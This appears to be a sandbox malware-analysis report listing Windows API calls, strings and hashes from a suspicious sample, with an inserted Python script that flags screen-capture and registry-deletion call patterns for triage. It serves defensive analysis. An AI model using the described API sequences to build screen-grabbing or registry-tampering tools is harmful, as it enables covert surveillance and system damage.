                                                                                Similarity
                                                                                • API ID: _wcslen$MessageSend$BuffCharUpper
                                                                                • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                • API String ID: 1103490817-4258414348
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharUpper
                                                                                • String ID: HKCC$HKCR$HKCU$HKEY_CLASSES_ROOT$HKEY_CURRENT_CONFIG$HKEY_CURRENT_USER$HKEY_LOCAL_MACHINE$HKEY_USERS$HKLM$HKU
                                                                                • API String ID: 1256254125-909552448
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004E835A
                                                                                • _wcslen.LIBCMT ref: 004E836E
                                                                                • _wcslen.LIBCMT ref: 004E8391
                                                                                • _wcslen.LIBCMT ref: 004E83B4
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00002010), ref: 004E83F2
                                                                                • LoadLibraryExW.KERNEL32(?,00000000,00000032,?,?,00000001,?,?,?,004E361A,?), ref: 004E844E
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004E8487
                                                                                • LoadImageW.USER32(00000000,?,00000001,?,?,00000000), ref: 004E84CA
                                                                                • LoadImageW.USER32(?,?,00000001,?,?,00000000), ref: 004E8501
                                                                                • FreeLibrary.KERNEL32(?), ref: 004E850D
                                                                                • ExtractIconExW.SHELL32(?,00000000,00000000,00000000,00000001), ref: 004E851D
                                                                                • DestroyIcon.USER32(?), ref: 004E852C
                                                                                • SendMessageW.USER32(?,00000170,00000000,00000000), ref: 004E8549
                                                                                • SendMessageW.USER32(?,00000064,00000172,00000001), ref: 004E8555
                                                                                Similarity
                                                                                • API ID: Load$Image_wcslen$IconLibraryMessageSend$DestroyExtractFree
                                                                                • String ID: .dll$.exe$.icl
                                                                                • API String ID: 799131459-1154884017
                                                                                Similarity
                                                                                • API ID:
                                                                                • String ID: "$#OnAutoItStartRegister$#ce$#comments-end$#comments-start$#cs$#include$#include-once$#notrayicon$#pragma compile$#requireadmin$'$Bad directive syntax error$Cannot parse #include$Unterminated group of comments
                                                                                • API String ID: 0-1645009161
                                                                                APIs
                                                                                • LoadIconW.USER32(00000063), ref: 004B5A2E
                                                                                • SendMessageW.USER32(?,00000080,00000000,00000000), ref: 004B5A40
                                                                                • SetWindowTextW.USER32(?,?), ref: 004B5A57
                                                                                • GetDlgItem.USER32(?,000003EA), ref: 004B5A6C
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004B5A72
                                                                                • GetDlgItem.USER32(?,000003E9), ref: 004B5A82
                                                                                • SetWindowTextW.USER32(00000000,?), ref: 004B5A88
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 004B5AA9
                                                                                • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 004B5AC3
                                                                                • GetWindowRect.USER32(?,?), ref: 004B5ACC
                                                                                • _wcslen.LIBCMT ref: 004B5B33
                                                                                • SetWindowTextW.USER32(?,?), ref: 004B5B6F
                                                                                • GetDesktopWindow.USER32 ref: 004B5B75
                                                                                • GetWindowRect.USER32(00000000), ref: 004B5B7C
                                                                                • MoveWindow.USER32(?,?,00000080,00000000,?,00000000), ref: 004B5BD3
                                                                                • GetClientRect.USER32(?,?), ref: 004B5BE0
                                                                                • PostMessageW.USER32(?,00000005,00000000,?), ref: 004B5C05
                                                                                • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 004B5C2F
                                                                                Similarity
                                                                                • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer_wcslen
                                                                                • String ID:
                                                                                • API String ID: 895679908-0
                                                                                Similarity
                                                                                • API ID: _wcslen
                                                                                • String ID: CLASS$CLASSNN$INSTANCE$NAME$REGEXPCLASS$TEXT$[Q
                                                                                • API String ID: 176396367-4233246236
                                                                                APIs
                                                                                • __scrt_initialize_thread_safe_statics_platform_specific.LIBCMT ref: 004700C6
                                                                                  • Part of subcall function 004700ED: InitializeCriticalSectionAndSpinCount.KERNEL32(0052070C,00000FA0,2ACE7588,?,?,?,?,004923B3,000000FF), ref: 0047011C
                                                                                  • Part of subcall function 004700ED: GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,?,?,004923B3,000000FF), ref: 00470127
                                                                                  • Part of subcall function 004700ED: GetModuleHandleW.KERNEL32(kernel32.dll,?,?,?,?,004923B3,000000FF), ref: 00470138
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,InitializeConditionVariable), ref: 0047014E
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 0047015C
                                                                                  • Part of subcall function 004700ED: GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 0047016A
                                                                                  • Part of subcall function 004700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 00470195
                                                                                  • Part of subcall function 004700ED: __crt_fast_encode_pointer.LIBVCRUNTIME ref: 004701A0
                                                                                • ___scrt_fastfail.LIBCMT ref: 004700E7
                                                                                  • Part of subcall function 004700A3: __onexit.LIBCMT ref: 004700A9
                                                                                Strings
                                                                                • WakeAllConditionVariable, xrefs: 00470162
                                                                                • kernel32.dll, xrefs: 00470133
                                                                                • SleepConditionVariableCS, xrefs: 00470154
                                                                                • InitializeConditionVariable, xrefs: 00470148
                                                                                • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00470122
                                                                                 Memory Dump Source
                                                                                 • Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
                                                                                 • Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
                                                                                 • Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
                                                                                Joe Sandbox IDA Plugin
                                                                                • Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
                                                                                Similarity
                                                                                • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                • API String ID: 66158676-1714406822
                                                                                APIs
                                                                                • CharLowerBuffW.USER32(00000000,00000000,004ECC08), ref: 004C4527
                                                                                • _wcslen.LIBCMT ref: 004C453B
                                                                                • _wcslen.LIBCMT ref: 004C4599
                                                                                • _wcslen.LIBCMT ref: 004C45F4
                                                                                • _wcslen.LIBCMT ref: 004C463F
                                                                                • _wcslen.LIBCMT ref: 004C46A7
                                                                                  • Part of subcall function 0046F9F2: _wcslen.LIBCMT ref: 0046F9FD
                                                                                • GetDriveTypeW.KERNEL32(?,00516BF0,00000061), ref: 004C4743
                                                                                Similarity
                                                                                • API ID: _wcslen$BuffCharDriveLowerType
                                                                                • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                • API String ID: 2055661098-1000479233
                                                                                APIs
                                                                                  • Part of subcall function 00469BA1: GetWindowLongW.USER32(00000000,000000EB), ref: 00469BB2
                                                                                • DragQueryPoint.SHELL32(?,?), ref: 004E9147
                                                                                  • Part of subcall function 004E7674: ClientToScreen.USER32(?,?), ref: 004E769A
                                                                                  • Part of subcall function 004E7674: GetWindowRect.USER32(?,?), ref: 004E7710
                                                                                  • Part of subcall function 004E7674: PtInRect.USER32(?,?,004E8B89), ref: 004E7720
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004E91B0
                                                                                • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 004E91BB
                                                                                • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 004E91DE
                                                                                • SendMessageW.USER32(?,000000C2,00000001,?), ref: 004E9225
                                                                                • SendMessageW.USER32(?,000000B0,?,?), ref: 004E923E
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004E9255
                                                                                • SendMessageW.USER32(?,000000B1,?,?), ref: 004E9277
                                                                                • DragFinish.SHELL32(?), ref: 004E927E
                                                                                • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 004E9371
                                                                                Similarity
                                                                                • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen
                                                                                • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID$p#R
                                                                                • API String ID: 221274066-4113308805
                                                                                APIs
                                                                                • _wcslen.LIBCMT ref: 004DB198
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DB1B0
                                                                                • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 004DB1D4
                                                                                • _wcslen.LIBCMT ref: 004DB200
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DB214
                                                                                • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 004DB236
                                                                                • _wcslen.LIBCMT ref: 004DB332
                                                                                  • Part of subcall function 004C05A7: GetStdHandle.KERNEL32(000000F6), ref: 004C05C6
                                                                                • _wcslen.LIBCMT ref: 004DB34B
                                                                                • _wcslen.LIBCMT ref: 004DB366
                                                                                • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 004DB3B6
                                                                                • GetLastError.KERNEL32(00000000), ref: 004DB407
                                                                                • CloseHandle.KERNEL32(?), ref: 004DB439
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB44A
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB45C
                                                                                • CloseHandle.KERNEL32(00000000), ref: 004DB46E
                                                                                • CloseHandle.KERNEL32(?), ref: 004DB4E3
                                                                                Similarity
                                                                                • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                • String ID:
                                                                                • API String ID: 2178637699-0
                                                                                APIs
                                                                                • GetMenuItemCount.USER32(00521990), ref: 00492F8D
                                                                                • GetMenuItemCount.USER32(00521990), ref: 0049303D
                                                                                • GetCursorPos.USER32(?), ref: 00493081
                                                                                • SetForegroundWindow.USER32(00000000), ref: 0049308A
                                                                                • TrackPopupMenuEx.USER32(00521990,00000000,?,00000000,00000000,00000000), ref: 0049309D
                                                                                • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 004930A9
                                                                                Similarity
                                                                                • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                • String ID: 0
                                                                                • API String ID: 36266755-4108050209
                                                                                APIs
                                                                                • DestroyWindow.USER32(?,?), ref: 004E6DEB
                                                                                  • Part of subcall function 00456B57: _wcslen.LIBCMT ref: 00456B6A
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 004E6E5F
                                                                                • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 004E6E81
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E6E94
                                                                                • DestroyWindow.USER32(?), ref: 004E6EB5
                                                                                • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00450000,00000000), ref: 004E6EE4
                                                                                • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 004E6EFD
                                                                                • GetDesktopWindow.USER32 ref: 004E6F16
                                                                                • GetWindowRect.USER32(00000000), ref: 004E6F1D
                                                                                • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 004E6F35
                                                                                • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 004E6F4D
                                                                                  • Part of subcall function 00469944: GetWindowLongW.USER32(?,000000EB), ref: 00469952
                                                                                Similarity
                                                                                • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                • String ID: 0$tooltips_class32
                                                                                • API String ID: 2429346358-3619404913
                                                                                APIs
                                                                                • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 004CC4B0
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004CC4C3
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004CC4D7
                                                                                • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 004CC4F0
                                                                                • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 004CC533
                                                                                • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 004CC549
                                                                                • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 004CC554
                                                                                • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 004CC584
                                                                                • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 004CC5DC
                                                                                • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 004CC5F0
                                                                                • InternetCloseHandle.WININET(00000000), ref: 004CC5FB
                                                                                Similarity
                                                                                • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                • String ID:
                                                                                • API String ID: 3800310941-3916222277
APIs
• CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000000,00000000,?,00000000,?), ref: 004E8592
• GetFileSize.KERNEL32(00000000,00000000), ref: 004E85A2
• GlobalAlloc.KERNEL32(00000002,00000000), ref: 004E85AD
• CloseHandle.KERNEL32(00000000), ref: 004E85BA
• GlobalLock.KERNEL32(00000000), ref: 004E85C8
• ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 004E85D7
• GlobalUnlock.KERNEL32(00000000), ref: 004E85E0
• CloseHandle.KERNEL32(00000000), ref: 004E85E7
• CreateStreamOnHGlobal.OLE32(00000000,00000001,?), ref: 004E85F8
• OleLoadPicture.OLEAUT32(?,00000000,00000000,004EFC38,?), ref: 004E8611
• GlobalFree.KERNEL32(00000000), ref: 004E8621
• GetObjectW.GDI32(?,00000018,000000FF), ref: 004E8641
• CopyImage.USER32(?,00000000,00000000,?,00002000), ref: 004E8671
• DeleteObject.GDI32(00000000), ref: 004E8699
• SendMessageW.USER32(?,00000172,00000000,00000000), ref: 004E86AF
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
• String ID:
• API String ID: 3840717409-0
• Opcode ID: a76d2a2d52f1c7b9a7eb7d5ba22a82c0175db1ed6d3134cc6840da788675c8b8
• Instruction ID: 620a6ff6c0106cd539a7c751f9c0e5118a4304464e7710eabee683fd7ee1f039
• Opcode Fuzzy Hash: a76d2a2d52f1c7b9a7eb7d5ba22a82c0175db1ed6d3134cc6840da788675c8b8
• Instruction Fuzzy Hash: 9C412B75600248BFDB11DFA5CC88EAB7BB8FF89711F104069F919EB261DB349902CB24
APIs
• VariantInit.OLEAUT32(00000000), ref: 004C1502
• VariantCopy.OLEAUT32(?,?), ref: 004C150B
• VariantClear.OLEAUT32(?), ref: 004C1517
• VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 004C15FB
• VarR8FromDec.OLEAUT32(?,?), ref: 004C1657
• VariantInit.OLEAUT32(?), ref: 004C1708
• SysFreeString.OLEAUT32(?), ref: 004C178C
• VariantClear.OLEAUT32(?), ref: 004C17D8
• VariantClear.OLEAUT32(?), ref: 004C17E7
• VariantInit.OLEAUT32(00000000), ref: 004C1823
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem
• String ID: %4d%02d%02d%02d%02d%02d$Default
• API String ID: 1234038744-3931177956
• Opcode ID: f8f7177d592fe8d7c9eeec37d1425d5ddda347ba81b0a114fd76a0de1031e8a9
• Instruction ID: ff75408efad277d273aab2ddf09b0b0fb1caf01794854f792ffaf29bc0e05cb9
• Opcode Fuzzy Hash: f8f7177d592fe8d7c9eeec37d1425d5ddda347ba81b0a114fd76a0de1031e8a9
• Instruction Fuzzy Hash: 8ED12475600110EBCB409F65D885F79B7B1BF46700F90805FF806AB2A2DB38EC46DB5A
APIs
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
  • Part of subcall function 004DC998: CharUpperBuffW.USER32(?,?,?,?,?,?,?,004DB6AE,?,?), ref: 004DC9B5
  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DC9F1
  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA68
  • Part of subcall function 004DC998: _wcslen.LIBCMT ref: 004DCA9E
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DB6F4
• RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004DB772
• RegDeleteValueW.ADVAPI32(?,?), ref: 004DB80A
• RegCloseKey.ADVAPI32(?), ref: 004DB87E
• RegCloseKey.ADVAPI32(?), ref: 004DB89C
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 004DB8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004DB904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 004DB922
• FreeLibrary.KERNEL32(00000000), ref: 004DB983
• RegCloseKey.ADVAPI32(00000000), ref: 004DB994
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
• API String ID: 146587525-4033151799
• Opcode ID: 18ff1f9cd202343d6426907941e076986433c716c22bf0960b43ee56688ddeac
• Instruction ID: e1e3191414202a2475e080c6d73527ed6df1b542afcf31b6ecc65070481f51ab
• Opcode Fuzzy Hash: 18ff1f9cd202343d6426907941e076986433c716c22bf0960b43ee56688ddeac
• Instruction Fuzzy Hash: 9DC17B74204241EFD710DF15C4A4B2ABBE5EF84318F15859EF89A4B3A2CB39EC46CB95
APIs
• GetDC.USER32(00000000), ref: 004D25D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004D25E8
• CreateCompatibleDC.GDI32(?), ref: 004D25F4
• SelectObject.GDI32(00000000,?), ref: 004D2601
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004D266D
• GetDIBits.GDI32(?,?,00000000,00000000,00000000,00000028,00000000), ref: 004D26AC
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004D26D0
• SelectObject.GDI32(?,?), ref: 004D26D8
• DeleteObject.GDI32(?), ref: 004D26E1
• DeleteDC.GDI32(?), ref: 004D26E8
• ReleaseDC.USER32(00000000,?), ref: 004D26F3
Strings
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
• API String ID: 2598888154-3887548279
• Opcode ID: e52e226ee292ec9dcd5a4cbee068d6451cc4a1e8de6b41a830cac3865e655ffa
• Instruction ID: 95b1bfdaa0941f0468d7edc68daa9603f919164464a18dfcc25b5264e4bf3d22
• Opcode Fuzzy Hash: e52e226ee292ec9dcd5a4cbee068d6451cc4a1e8de6b41a830cac3865e655ffa
• Instruction Fuzzy Hash: 8B61F175D00219EFCF04CFA8D984AAEBBB5FF48310F20852AE955A7351D774A942CFA4
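Two of the listings above are the kind of API combination a reviewer scans these reports for: the routine at 004DB6F4..004DB994 that resolves RegDeleteKeyExW by hand through LoadLibraryA/GetProcAddress before deleting a key, and the routine at 004D25D8..004D26F3 whose GetDC, CreateCompatibleBitmap, StretchBlt and GetDIBits sequence copies the screen into a DIB. The Python script below is an added example, not part of the Joe Sandbox report or its tooling: it parses the "APIs" listings in the text form shown here, recovers the export names that only appear as GetProcAddress arguments, and matches each function against a small rule set. The sample input is constructed to mirror those two entries, and the rule names and their API sets are my own assumptions, not Joe Sandbox signatures.

```python
"""Parse the per-function "APIs" listings of a Joe Sandbox report (text form as above)
and flag API combinations worth a closer look. Added example; the rules are assumptions."""
import re

# One bullet of an APIs listing, with or without the "Part of subcall function" prefix.
API_LINE = re.compile(
    r"•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<api>\w+)\.(?P<mod>\w+)(?:\((?P<args>[^)]*)\))?,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+)"
)

# Assumed rules: every name in `all_of` must appear, plus one name from each `any_of` set.
RULES = {
    "screen capture (GDI copy to DIB)": {
        "all_of": {"GetDC", "CreateCompatibleBitmap", "GetDIBits"},
        "any_of": [{"StretchBlt", "BitBlt"}],
    },
    "registry key deletion via dynamically resolved export": {
        "all_of": {"GetProcAddress"},
        "any_of": [{"LoadLibraryA", "LoadLibraryW"}, {"RegDeleteKeyW", "RegDeleteKeyExW"}],
    },
}

# Constructed sample in the report's listing format, mirroring two of the entries above.
SAMPLE_REPORT = """\
APIs
• GetDC.USER32(00000000), ref: 004D25D8
• CreateCompatibleBitmap.GDI32(00000000,?,?), ref: 004D25E8
• StretchBlt.GDI32(?,00000000,00000000,?,?,?,00000006,?,?,?,00CC0020), ref: 004D266D
• GetDIBits.GDI32(?,?,00000000,?,00000000,00000028,00000000), ref: 004D26D0
Similarity
• API ID: Object$BitsCompatibleCreateDeleteSelect$BitmapReleaseStretch
• String ID: (
APIs
  • Part of subcall function 00459CB3: _wcslen.LIBCMT ref: 00459CBD
• RegConnectRegistryW.ADVAPI32(?,?,?), ref: 004DB6F4
• LoadLibraryA.KERNEL32(advapi32.dll), ref: 004DB8F2
• GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 004DB904
• RegDeleteKeyW.ADVAPI32(?,?), ref: 004DB922
Similarity
• API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
• String ID: RegDeleteKeyExW$advapi32.dll
"""


def parse_entries(text):
    """Split the text at each 'APIs' header; collect the calls and IDs that follow it."""
    entries, current = [], None
    for line in text.splitlines():
        stripped = line.strip()
        if stripped == "APIs":
            current = {"apis": [], "api_id": "", "string_id": ""}
            entries.append(current)
            continue
        if current is None:  # text before the first listing
            continue
        m = API_LINE.search(line)
        if m:
            current["apis"].append({
                "api": m["api"], "module": m["mod"], "ref": m["ref"].upper(),
                "args": [a.strip() for a in (m["args"] or "").split(",") if a.strip()],
                "subcall_of": (m["sub"] or "").upper() or None,
            })
        elif stripped.startswith("• API ID:"):
            current["api_id"] = stripped.split(":", 1)[1].strip()
        elif stripped.startswith("• String ID:"):
            current["string_id"] = stripped.split(":", 1)[1].strip()
    return entries


def resolved_exports(entry):
    """(dll, export) pairs recovered from LoadLibrary*/GetProcAddress argument literals;
    unknown ('?') or numeric second arguments are skipped."""
    dll, pairs = None, []
    for call in entry["apis"]:
        if call["api"].startswith("LoadLibrary") and call["args"]:
            dll = call["args"][0]
        elif call["api"] == "GetProcAddress" and len(call["args"]) >= 2:
            name = call["args"][1]
            if name != "?" and not re.fullmatch(r"[0-9A-Fa-f]{8}", name):
                pairs.append((dll, name))
    return pairs


def match_behaviors(entry, include_subcalls=True):
    """Names of RULES satisfied by the entry's calls (subcall lines count by default,
    since they are part of the function's reachable behaviour)."""
    names = {c["api"] for c in entry["apis"] if include_subcalls or not c["subcall_of"]}
    return [rule for rule, spec in RULES.items()
            if spec["all_of"] <= names and all(names & group for group in spec["any_of"])]


def triage(text):
    """One row per listing: address of its first own call, matched rules, resolved exports."""
    rows = []
    for entry in parse_entries(text):
        own = [c for c in entry["apis"] if not c["subcall_of"]]
        rows.append((own[0]["ref"] if own else None, match_behaviors(entry), resolved_exports(entry)))
    return rows


if __name__ == "__main__":
    for ref, hits, exports in triage(SAMPLE_REPORT):
        print(ref, hits, exports)
```

Run it over a report saved as text and the triage row for the registry routine carries advapi32.dll/RegDeleteKeyExW, the export that the listing only exposes through the GetProcAddress argument and the String ID line; the rule set is deliberately small and is the place to add the API combinations your own triage cares about.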
APIs
• ___free_lconv_mon.LIBCMT ref: 0048DAA1
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D659
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D66B
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D67D
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D68F
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6A1
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6B3
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6C5
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6D7
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6E9
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D6FB
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D70D
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D71F
  • Part of subcall function 0048D63C: _free.LIBCMT ref: 0048D731
• _free.LIBCMT ref: 0048DA96
  • Part of subcall function 004829C8: RtlFreeHeap.NTDLL(00000000,00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000), ref: 004829DE
  • Part of subcall function 004829C8: GetLastError.KERNEL32(00000000,?,0048D7D1,00000000,00000000,00000000,00000000,?,0048D7F8,00000000,00000007,00000000,?,0048DBF5,00000000,00000000), ref: 004829F0
• _free.LIBCMT ref: 0048DAB8
• _free.LIBCMT ref: 0048DACD
• _free.LIBCMT ref: 0048DAD8
• _free.LIBCMT ref: 0048DAFA
• _free.LIBCMT ref: 0048DB0D
• _free.LIBCMT ref: 0048DB1B
• _free.LIBCMT ref: 0048DB26
• _free.LIBCMT ref: 0048DB5E
• _free.LIBCMT ref: 0048DB65
• _free.LIBCMT ref: 0048DB82
• _free.LIBCMT ref: 0048DB9A
Memory Dump Source
• Source File: 00000000.00000002.1703040739.0000000000451000.00000020.00000001.01000000.00000003.sdmp, Offset: 00450000, based on PE: true
• Associated: 00000000.00000002.1702982965.0000000000450000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.00000000004EC000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703173425.0000000000512000.00000002.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703313457.000000000051C000.00000004.00000001.01000000.00000003.sdmp
• Associated: 00000000.00000002.1703414600.0000000000524000.00000002.00000001.01000000.00000003.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_0_2_450000_Scanned-IMGS_from NomanGroup IDT.jbxd
Similarity
